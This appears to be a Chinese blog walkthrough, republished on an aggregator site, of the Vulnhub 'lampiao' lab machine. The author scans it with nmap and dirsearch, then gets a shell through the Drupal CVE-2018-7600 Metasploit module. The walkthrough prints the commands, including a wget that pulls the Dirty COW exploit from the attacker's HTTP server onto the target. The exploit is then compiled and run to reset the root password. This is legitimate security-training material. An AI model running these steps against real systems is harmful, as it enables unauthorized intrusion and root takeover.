Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现

这篇具有很好参考价值的文章主要介绍了Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

准备阶段

Kali版本:2022.3

目标主机ip:192.168.186.148

攻击机ip:192.168.186.147

vulnhub和vulhub不同,无需安装环境。

lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249

lampiaow提权,安全,web安全,linux


下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式

lampiaow提权,安全,web安全,linux

登陆界面如下,此时账户密码未知,需要我们去找啦

lampiaow提权,安全,web安全,linux

复现过程:

1、使用nmap命令对网段进行扫描,以确定lampiao靶机具体的ip地址。

ssh:远程连接

nmap -sS -Pn 192.168.186.0/24
//-sS SYN扫描,使用最频繁,安全、快
//-Pn 目标机禁用ping,绕过ping扫描

lampiaow提权,安全,web安全,linux

2、分别访问22端口(无法访问)和80端口(如图)

lampiaow提权,安全,web安全,linux

lampiaow提权,安全,web安全,linux

3、具体扫描一下该ip所有端口号,有新发现,访问该端口

nmap 192.168.186.148 -p1-65535

lampiaow提权,安全,web安全,linux

lampiaow提权,安全,web安全,linux

 思路一:

1)点击两个“read more”,分别显示?q=node/1和?q=node/3。

lampiaow提权,安全,web安全,linux

 lampiaow提权,安全,web安全,linux

2)唯独没有?q=node/2,试着访问一下,显示有两个文件

lampiaow提权,安全,web安全,linux

3)访问qrc.png,这里我用了离线识别二维码的小工具,大家也可以用微信扫描。

 

 4)没什么有用信息,所以我们去听音频。得到user:tiago

lampiaow提权,安全,web安全,linux

思路二:

1)通过dirsearch对该端口进行目录扫描,得到以下文件

dirsearch -u http://192.168.186.148:1898  #-u 指定网址

lampiaow提权,安全,web安全,linux

 2)访问CHANGE.txt文件,发现cms框架信息为Drupal 7.54

lampiaow提权,安全,web安全,linux

 3)百度看到有CVE-2018-7600远程代码执行漏洞lampiaow提权,安全,web安全,linux

 4)使用msf,查找CVE-2018-7600漏洞

msfconsole
search CVE-2018-7600

lampiaow提权,安全,web安全,linux

 lampiaow提权,安全,web安全,linux

 5)选中该漏洞,并设置好目标

use 0
show options #可以查到当前配置信息,需要配置目标主机的ip地址和端口
set rhosts 192.168.186.148 #设置目标地址
set rport 1898 #设置端口
show options

lampiaow提权,安全,web安全,linux

 lampiaow提权,安全,web安全,linux

 6)运行,可以输入命令测试

run
shell #转换为有回显的shell

lampiaow提权,安全,web安全,linux

 7)查看所有文件,但是无法访问root文件夹,此时需要提升权限。

ls -al #列出所有文件,包括隐藏文件

cd root

lampiaow提权,安全,web安全,linux

脏牛提权:

1、通过searchsploit工具找到提权脚本,定位40847.cpp,下载到/tmp目录

searchsploit dirty
locate linux/local/40847.cpp #定位40847.cpp的位置
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp #将40847.cpp复制到/tmp目录下

lampiaow提权,安全,web安全,linux

2、首先进入tmp目录,然后开启http服务,选用8080端口

python -m http.server 8080

lampiaow提权,安全,web安全,linux

 3、在目标主机下载40847.cpp文件,并进行编译成40847可执行文件

wget http://192.168.186.147:8080/40847.cpp

lampiaow提权,安全,web安全,linux

 4、执行该文件,可以得到root用户对应的密码!!

./40847

lampiaow提权,安全,web安全,linux

 5、去lampiao靶机登录,用户名root,密码dirtyCowFun,去查看所有文件,成功找到flag~

ls -al
cat flag.txt

lampiaow提权,安全,web安全,linux

 参考的大佬博客链接:

vulnhub--lampiao(脏牛提权)_鲨鱼辣椒k的博客-CSDN博客_脏牛提权

Lampiao_无人问津的椰子的博客-CSDN博客

完结撒花*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。~!

又肝了好几个小时,遇到了很多问题,记录的过程对脏牛提权有了更加深入和清晰的认识啦~

希望能帮助到和我一样是小白的同学们捏~( ̄▽ ̄)~*

lampiaow提权,安全,web安全,linux文章来源地址https://www.toymoban.com/news/detail-813191.html

到了这里,关于Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Linux提权—脏牛漏洞(CVE-2016-5195)复现

    脏牛漏洞:         脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:        【影响版本】:该漏洞在全版本Linux系统(Linux kernel = 2.6.22)均可

    2024年02月15日
    浏览(37)
  • Vulnhub之Decoy靶机-详细提权过程补充

    在拿到用户296640a3b825115a47b68fc44501c828的密码server后,为了方便观察现象,同时开启两个shell,并且需要指定-t \\\"bash --noprofile\\\"以逃避受限shell,登录成功后,要修改PATH环境变量,使其包含正常的环境变量: 在日志文件中看到有关chkrootkit的日志信息,chkrootkit是检查系统是否存在后门的

    2024年02月06日
    浏览(24)
  • Vulnhub之Harrison靶机详细测试过程(提权成功)

    作者:jason huawen 名称: SP: harrison 地址: 利用Kali LInux的netdiscover工具识别目标主机的IP地址为192.168.56.125 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、445(samba) enum4linux识别出用户名harrison 没那么容易? 虽然得到了shell,但是这是受限的shell 用-t选项指定不同的shell没能逃脱

    2023年04月23日
    浏览(29)
  • Vulnhub之Funbox 4靶机详细测试过程(提权成功)

    名称:Funbox: CTF URL: 将靶机导入 VirtualBox。配置其网卡为主机模式配置。启动 Kali Linux 和靶机。 内置 netdiscovery工具 可以将靶机的 IP 地址识别为 192.168.56.150。 利用NMAP工具进行全端口扫描: NMAP扫描结果表明目标主机有4个开放端口: 22(ssh),80(http),110(pop3),143(imap) 其实作者给出了

    2024年02月03日
    浏览(28)
  • Vulnhub之Hacksudo Thor靶机详细测试过程(提权成功)

    作者:jason huawen 名称:hacksudo: Thor 地址: 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.160 NMAP扫描结果显示目标主机有2个开放端口:22(ssh)、80(http),21端口状态为过滤 Gobuster工具没有扫描出有价值的目录或者文件,更换字典继续扫描: 更换字典后,扫描出/ad

    2023年04月26日
    浏览(27)
  • Vulnhub之M87靶机详细测试过程(不同提权方法)

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.250 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、9090(ssl) 浏览器访问80端口,为用户登录界面,需要输入email和密码。 nikto工具发现了/admin目录,访问该目录,为用户登录界面, 80端口发现了/admin目录,

    2023年04月10日
    浏览(24)
  • Vulnhub之Hacksudo Search靶机详细测试过程(不同提权方法)

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.162 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) nikto发现目录/account/,该目录下虽然有众多文件,但是访问这些文件,返回均为空。 nikto另外发现了/.env, 该文件包含了数据库连接用户名和密码,但是该

    2023年04月25日
    浏览(31)
  • Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)

    域名:ceng-company.vm 可能的用户名: kevin, aaron 其他:kevin可能密码比较弱 但是访问域名ceng-company.vm,返回页面内容没有发生变化 目录扫描没有啥收获,是否存在子域名? 发现admin子域名返回状态码为403 将该子域名加入到/etc/hosts文件: 访问admin.ceng-company.vm返回“Forbidden\\\",是

    2024年02月10日
    浏览(23)
  • vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)

    信息收集就略了,nmap就可以了,没有太多知识 你会收集到 1.网页绝对路径,这里通过sql注入上传文件或者通过sqlmap获取–os-shell会用到 2.http://靶场ip/se3reTdir777/index.php# 这是一个sql注入页面 先测试有无SQL注入漏洞,输入SQL注入测试神技  \\\' 进行测试 提示我们存在SQL语句错误,表

    2024年01月21日
    浏览(35)
  • Vulnhub之Ino靶机详细测试过程(采用完全不同方法获得Shell以及本地提权)

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.253 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) 访问80端口,从返回的页面看CMS为Lot Reservation Management System 但目前不知道版本,先看一下有无其他目录可利用。 会被自动重定向到/lot目录。 用Gobuster工具无

    2023年04月16日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包